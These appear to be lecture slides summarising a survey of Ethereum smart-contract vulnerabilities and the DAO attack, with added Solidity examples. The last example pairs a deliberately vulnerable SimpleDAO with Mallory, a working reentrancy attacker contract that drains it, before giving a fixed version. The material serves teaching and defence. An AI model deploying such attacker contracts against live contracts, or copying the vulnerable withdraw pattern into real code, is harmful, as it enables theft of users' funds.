Smart Contracts in Ethereum and their Vulnerabilities


“When smart people hear the term “smart contracts”, their imaginations tend to run wild. They conjure up dreams of autonomous intelligent software, going off into the world, taking data along for the ride. Unfortunately, the reality of smart contracts is more mundane.”
Dr Gideon Greenspan - Founder and CEO of Coin Sciences

Smart Contracts in Ethereum and their Vulnerabilities
Alex Harris & Tancredi Castellano Pucci

Survey: Attacks on Ethereum Smart Contracts
Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli

What is a Smart Contract?
● Smart contracts are computer programs that are executed correctly by a network of mutually distrusting nodes, without the need for a trusted central authority.
● They might more accurately be called automatic escrow accounts.
● Smart contracts manage and transfer valuable assets, so it is essential that they execute correctly and are secure against attacks.
● Applications: finance, insurance, e-commerce, auditing and taxation, elections.

Brief History of Smart Contracts
● The principle of smart contracts was first described by Nick Szabo in 1996.
● Digital protocols for information transfer that use algorithms to execute a transaction automatically once the established conditions are met, and that fully control the process.
● Why did smart contracts become so closely linked with the distributed ledger?
● Isn’t it wasteful to have every node run the smart contract?
● Bitcoin first appeared in 2008; Ethereum was proposed in 2013 and launched in 2015.
● So far, Ethereum is the best-known and most-used network for smart contracts, so the paper discusses these issues in this context.

Smart Contracts on Ethereum
● The consensus protocol specifies how the nodes of the peer-to-peer network extend the blockchain, with the goal of ensuring correct execution.
● Ethereum contracts are written in a Turing-complete language, unlike Bitcoin scripts.
● Bitcoin Script is deliberately not Turing-complete: it is a stack-based language without loops, so every script terminates and the halting problem does not arise.
● Assumptions of the paper:
○ The Ethereum blockchain is immutable.
○ Ethereum is secure if a majority of the computational power is controlled by honest nodes.
○ Ethereum smart contracts execute correctly (which is still insufficient to make smart contracts secure).

Example: A Simple Wallet Contract
● The constructor AWallet runs only once, when the contract is created.
● The function pay sends amount wei (1 wei = 10^-18 ether) from the contract to recipient.
● The contract throws an exception if the caller is not the owner, or if some ether is attached to the call and thereby transferred to the contract.
● The call terminates if the required amount is unavailable.
● Note that send may fail if the recipient is a contract (see “Gasless send” below).

Why are Ethereum smart contracts so vulnerable?
● Ethereum uses Solidity, a high-level language with counterintuitive semantics, which compiles into EVM bytecode.
○ Solidity looks like a typed JavaScript-like language, but several of its features behave unexpectedly.
○ Computation steps are recorded on a public blockchain, where they can be unpredictably reordered or delayed.
○ When an exception is thrown it cannot be caught: execution stops, the fee is lost, and all side effects, including transfers of ether, are reverted.
● Ethereum executes Turing-complete EVM bytecode; termination is enforced only by the gas limit, not by the language itself.
○ Bugs in a contract appended to the blockchain cannot be changed.
○ Ether can be lost in transfer.
○ EVM bytecode has no native notion of functions. Instead, each function is identified by a signature derived from its name and parameter types (the first four bytes of the Keccak-256 hash of the canonical signature).

Vulnerability Type: Solidity
● Example: Gasless send
● Related to the counterintuitive semantics of Solidity.
● When using send to transfer ether to a contract, it is possible to incur an out-of-gas exception. This is counterintuitive because programmers do not associate transferring ether with executing code.
● c.send(amount) is compiled in the same way as a call with an empty signature, but the number of gas units forwarded is bounded.
● Since the call has no signature, it invokes the callee’s fallback function.
● The gas stipend (2300 units) allows only a limited set of instructions; a fallback that does anything more (for example, writing to storage) ends in an out-of-gas exception, and send returns false instead of throwing, so a caller that ignores the return value never notices.

Vulnerability Type: Solidity
● Example: Keeping secrets
● Fields in contracts can be either public or private.
● Declaring a field private does not ensure its secrecy.
● To set the value of a field, users must send a suitable transaction to miners, who then publish it on the blockchain. The new value can therefore be inferred from the public contents of the transaction.
● Where secrecy is required, timed commitments and other cryptographic techniques can be used to keep the field’s value hidden until it is meant to be revealed.
○ E.g. applications in multiplayer games.

Vulnerability Type: EVM
● Example: Immutable bugs
● Once a contract is published on the blockchain, it cannot be altered.
● This creates a problem if a contract contains a bug, since there is no direct way to patch it.
● Programmers must therefore anticipate ways to alter or terminate a contract when implementing it.
● We will see how this played out in the DAO attack, where the vulnerable contract could not be patched once deployed.

Vulnerability Type: EVM
● Example: Ether lost in transfer
● When sending ether, it is necessary to specify the recipient’s address. Many of these addresses are orphan, i.e. not associated with any user or contract.
● Ether sent to an orphan address is lost forever, and there is no way to detect whether an address is orphan.
● The only option is to ensure the correctness of recipient addresses manually.
○ How?

Vulnerability Type: Blockchain
● Example: Unpredictable state
● The state of a contract is determined by the value of its fields and its balance.
● A user cannot be sure that a transaction broadcast to the network will be run in the same state the contract was in at the time of broadcast.
● Other transactions may have changed the contract state in the meantime, and miners are not required to preserve any particular order.
● The actual state also becomes ambiguous in the event of a hard fork.

Vulnerability Type: Blockchain
● Example: Time constraints
● Typically implemented using block timestamps, agreed upon by all miners.
● All transactions within a block share the same timestamp.
● The miner who creates a block can therefore choose its timestamp with some degree of freedom.

The DAO Attack
● The DAO was a contract implementing a crowdfunding platform.
● It raised around $150M before the attack on June 18, 2016.
● The attacker managed to get about $60M under their control before a hard fork nullified the effects of the attack transactions.

The DAO Attack
● Attack #1: Similar to the actual DAO attack. Allows the adversary to steal all the ether from SimpleDAO.
● First step: Publish the contract Mallory (see next slide). The adversary donates some ether for Mallory, and invokes withdraw, which transfers the ether to Mallory.
● Crucial step: The function call used for this purpose has the side effect of invoking Mallory’s fallback function, which maliciously calls back withdraw.
● This causes withdraw to be interrupted before it can update the credit field, so the check if (credit[msg.sender] >= amount) succeeds again.
● The DAO therefore sends the credit to Mallory again and invokes the fallback again, resulting in a malicious loop.
● The malicious loop continues until:
a. the gas is exhausted;
b. the call stack is full;
c. the balance of the DAO falls to zero.
● Overall, this attack allows the adversary to steal all the ether from the DAO.

The DAO Attack
● Attack #2: Similar to Attack #1, except that only two calls of the fallback function are required.
● First step: Publish the contract Mallory2, providing it with 1 wei. The adversary invokes attack to donate 1 wei to itself, and withdraws it.
● The function withdraw checks that the credit is sufficient, and if so transfers the ether to contract Mallory2.
● Once again, call invokes Mallory2’s fallback, which in turn calls withdraw.
● The check succeeds again since withdraw is interrupted as before.
● The DAO sends 1 wei to Mallory2 for a second time and invokes the fallback again, which does nothing this time.
● Now both pending invocations of withdraw resume and each subtracts 1 from Mallory2’s credit: the first brings it from 1 to 0, the second underflows the unsigned integer to 2^256 - 1 wei.
● Finally, Mallory2 invokes getJackpot, which uses this huge credit to withdraw all the ether from SimpleDAO and transfers it to Mallory2’s owner.

The DAO Attack
● Key vulnerability: Both attacks are possible because SimpleDAO sends the specified amount of ether before updating the credit. They exploit the “call to the unknown” and “reentrancy” vulnerabilities that the survey catalogues at the Solidity level.
● Which is better: Attack #1 or Attack #2?
○ How do the sizes of investment compare between the two attacks?

The DAO Attack
● Resolution: HARD FORK
● Parallels between the hard fork in response to the DAO attack and bank bailouts in the wake of the financial crisis?
● Which vulnerabilities enabled the DAO attack?
● Which vulnerabilities in Ethereum are you most concerned about? Why?

Automatic Analysis of Safety/Soundness of Smart Contracts
Why do we need said tools?
● The current state of empirical knowledge within the area is very limited.
○ Educational/vocational resources are still rare.
● More thoroughly checked contracts are needed, given that hackers have walked away with 14% of digital currencies (approx. 10B USD).
● Contracts need to get better, but do we need automatic tools?
○ Yes
■ Manual auditing remains laborious and error-prone.
○ No
■ Contracts tend to be less than 200 lines of code (due to gas cost).
■ 1% of contracts contain 99% of the value in the smart contract ecosystem.
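The “Gasless send” slides above, worked through in code. This is an added example, not code from the slides or from the survey they summarize; it assumes a Solidity 0.8 compiler, and the contract and function names (GreedyRecipient, Payer, payUnchecked, payChecked, selectorMatches) are chosen here to mirror the slide’s AWallet.pay. It shows a recipient whose fallback does more than the 2300-gas stipend allows, a payer that silently loses the failure, the checked version, and how the EVM identifies a function by the first four bytes of the Keccak-256 hash of its signature.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from the slides or from the survey they summarize.
// "Gasless send": send() forwards only a 2300-gas stipend, so a recipient
// contract whose receive() does real work makes the send fail, and a caller
// that ignores the bool result never notices. Names are assumptions.

// A recipient that accounts for incoming ether in storage. A single SSTORE
// costs thousands of gas, far more than the 2300 stipend, so send()/transfer()
// to this contract always runs out of gas inside receive().
contract GreedyRecipient {
    uint256 public received;

    receive() external payable {
        received += msg.value; // SSTORE: exceeds the stipend, the inner call reverts
    }
}

contract Payer {
    address public owner;

    constructor() payable {
        owner = msg.sender;
    }

    // Lets the wallet be funded after deployment. Empty calldata (what send()
    // produces) reaches receive(); calldata whose first 4 bytes match no selector
    // would reach fallback(), and with none defined the call reverts.
    receive() external payable {}

    // Mirrors the slide's AWallet.pay. The function is not payable, so attaching
    // ether reverts automatically. BUG: the bool returned by send() is ignored;
    // against a GreedyRecipient the call returns false, the owner believes the
    // payment went through, and the ether is still sitting in this contract.
    function payUnchecked(uint256 amount, address payable recipient) external {
        require(msg.sender == owner, "not owner");
        recipient.send(amount);
    }

    // Hardened: treat a false return as an error. transfer() is the same
    // operation with this require built in.
    function payChecked(uint256 amount, address payable recipient) external {
        require(msg.sender == owner, "not owner");
        require(recipient.send(amount), "send failed: recipient reverted or out of gas");
    }

    // How the EVM identifies a function: the first 4 bytes of keccak256 of the
    // canonical signature, which is what the slide means by "identified by a signature".
    function selectorMatches() external view returns (bool) {
        return this.payChecked.selector == bytes4(keccak256("payChecked(uint256,address)"));
    }
}
```

Deploy Payer with some ether, then call payUnchecked with a GreedyRecipient address: the transaction succeeds, GreedyRecipient.received stays 0 and Payer’s balance is unchanged. payChecked with the same arguments reverts, which is the behaviour a wallet owner actually wants. selectorMatches returns true, confirming that the four-byte selector is nothing more than a truncated hash of the signature string.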
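The “Keeping secrets” and “Time constraints” slides above, worked through as a commit-reveal contract with a timed commitment. This is an added example, not code from the slides or from the survey; it assumes a Solidity 0.8 compiler, and the contract name, the two-phase deadlines, the deposit and the forfeit rule are design choices made here, not something the slides specify. The point is that a player’s move is never written to a field in the clear, because the transaction that sets the field is public; only a hash goes on chain, and the deposit makes refusing to reveal costly.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from the slides or from the survey. A hidden move
// (e.g. in a game) is committed as keccak256(move, salt, player) and revealed
// later; the deposit forfeited on failure to reveal is the "timed commitment"
// the slide mentions. Names, deadlines and the forfeit rule are assumptions.
contract CommitReveal {
    struct Commitment {
        bytes32 hash;     // keccak256(move, salt, player)
        uint256 deposit;  // stake that is lost if the player never reveals
        uint8 move;       // filled in on reveal
        bool revealed;
    }

    mapping(address => Commitment) public commitments;
    uint256 public immutable commitDeadline;
    uint256 public immutable revealDeadline;

    constructor(uint256 commitWindow, uint256 revealWindow) {
        // block.timestamp is chosen by the miner within a small tolerance (the
        // "Time constraints" slide), so windows must be minutes or more, never a
        // few seconds, or the miner decides which side of a deadline a tx lands on.
        commitDeadline = block.timestamp + commitWindow;
        revealDeadline = commitDeadline + revealWindow;
    }

    // Off-chain helper for players: the hash to commit to. The salt must be
    // high-entropy; with a guessable salt the move can be brute-forced from the
    // hash because the move space is tiny.
    function commitmentFor(uint8 move, bytes32 salt, address player) public pure returns (bytes32) {
        return keccak256(abi.encodePacked(move, salt, player));
    }

    // Phase 1: only the hash goes on chain. Binding the player's address into it
    // stops another player from copying the commitment.
    function commit(bytes32 hash) external payable {
        require(block.timestamp < commitDeadline, "commit phase over");
        require(msg.value > 0, "deposit required");
        require(commitments[msg.sender].hash == bytes32(0), "already committed");
        commitments[msg.sender] = Commitment(hash, msg.value, 0, false);
    }

    // Phase 2: move and salt are disclosed and the contract recomputes the hash.
    // The deposit is zeroed before the transfer (effects before interaction).
    function reveal(uint8 move, bytes32 salt) external {
        Commitment storage c = commitments[msg.sender];
        require(block.timestamp >= commitDeadline && block.timestamp < revealDeadline, "not in reveal phase");
        require(c.hash != bytes32(0) && !c.revealed, "nothing to reveal");
        require(commitmentFor(move, salt, msg.sender) == c.hash, "reveal does not match commitment");
        c.move = move;
        c.revealed = true;
        uint256 refund = c.deposit;
        c.deposit = 0;
        payable(msg.sender).transfer(refund);
    }

    // Timed commitment: after the reveal deadline, anyone may claim the deposit of
    // a player who committed but never revealed, so withholding a losing move costs money.
    function forfeit(address player) external {
        Commitment storage c = commitments[player];
        require(block.timestamp >= revealDeadline, "reveal phase still open");
        require(c.hash != bytes32(0) && !c.revealed && c.deposit > 0, "nothing to forfeit");
        uint256 amount = c.deposit;
        c.deposit = 0;
        payable(msg.sender).transfer(amount);
    }
}
```

Reading commitments(player) during the commit phase yields only the hash, which is useless without the salt; the move becomes public exactly when the player chooses to reveal it, and not before. The two separate deadlines matter: with a single deadline a player could wait for the others to reveal and then commit and reveal in one go.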
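The DAO attack slides above, reconstructed in code. This is an added example, not code from the slides or from the survey; it assumes a Solidity 0.8 compiler. SimpleDAO, Mallory, donate, withdraw and getJackpot follow the names used in the slides; the constructor argument, the SafeDAO contract and its reentrancy lock are additions made here. The vulnerable withdraw sends before it debits, so Mallory’s fallback reenters while the check still passes (Attack #1); the unchecked subtraction reproduces the pre-0.8 wrapping arithmetic that Attack #2’s Mallory2 relies on (Mallory2 is the same shape with a one-shot flag in its fallback and is omitted here). SafeDAO shows the fix.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not code from the slides or from the survey. Reconstructs the
// SimpleDAO pattern the slides describe (send before updating credit), an
// attacker in the shape of Mallory, and a hardened version. Names follow the
// slides; the constructor argument and the reentrancy lock are assumptions.
contract SimpleDAO {
    mapping(address => uint256) public credit;

    function donate(address to) external payable {
        credit[to] += msg.value;
    }

    // VULNERABLE. The external call forwards all remaining gas to msg.sender's
    // fallback, which can reenter withdraw() while credit is still unchanged, so
    // the check passes again (Attack #1). The call's result is ignored.
    function withdraw(uint256 amount) external {
        if (credit[msg.sender] >= amount) {
            msg.sender.call{value: amount}("");
            // Pre-0.8 compilers wrapped on underflow silently; `unchecked`
            // reproduces that, which is what lets Attack #2 drive credit to 2**256 - 1.
            unchecked {
                credit[msg.sender] -= amount;
            }
        }
    }
}

contract Mallory {
    SimpleDAO public dao;
    address payable public owner;

    constructor(SimpleDAO _dao) {
        dao = _dao;
        owner = payable(msg.sender);
    }

    // Step 1: donate some ether for Mallory, then withdraw it to start the chain.
    function attack() external payable {
        dao.donate{value: msg.value}(address(this));
        dao.withdraw(msg.value);
    }

    // Invoked by SimpleDAO's call{value: ...}: reenter before credit is debited.
    // The loop ends when the DAO can no longer pay (or on gas/stack exhaustion).
    receive() external payable {
        uint256 amount = dao.credit(address(this));
        if (amount > 0 && address(dao).balance >= amount) {
            dao.withdraw(amount);
        }
    }

    function getJackpot() external {
        owner.transfer(address(this).balance);
    }
}

// FIXED: checks-effects-interactions (debit before the external call), checked
// arithmetic (0.8 reverts on underflow), the call result is checked, and a
// reentrancy lock as defence in depth.
contract SafeDAO {
    mapping(address => uint256) public credit;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function donate(address to) external payable {
        credit[to] += msg.value;
    }

    function withdraw(uint256 amount) external nonReentrant {
        require(credit[msg.sender] >= amount, "insufficient credit");
        credit[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

Against SimpleDAO, one call to Mallory.attack with a deposit of X wei drains the DAO in multiples of X until its balance drops below X, exactly the loop the slides describe; the debit that runs after each level unwinds only touches Mallory’s credit, which the attacker no longer cares about. Pointing the same Mallory at SafeDAO fails twice over: the reentrant withdraw hits the lock and reverts, and even without the lock the credit has already been debited, so the second check fails and the checked call result turns the failed inner transfer into a revert of the whole transaction.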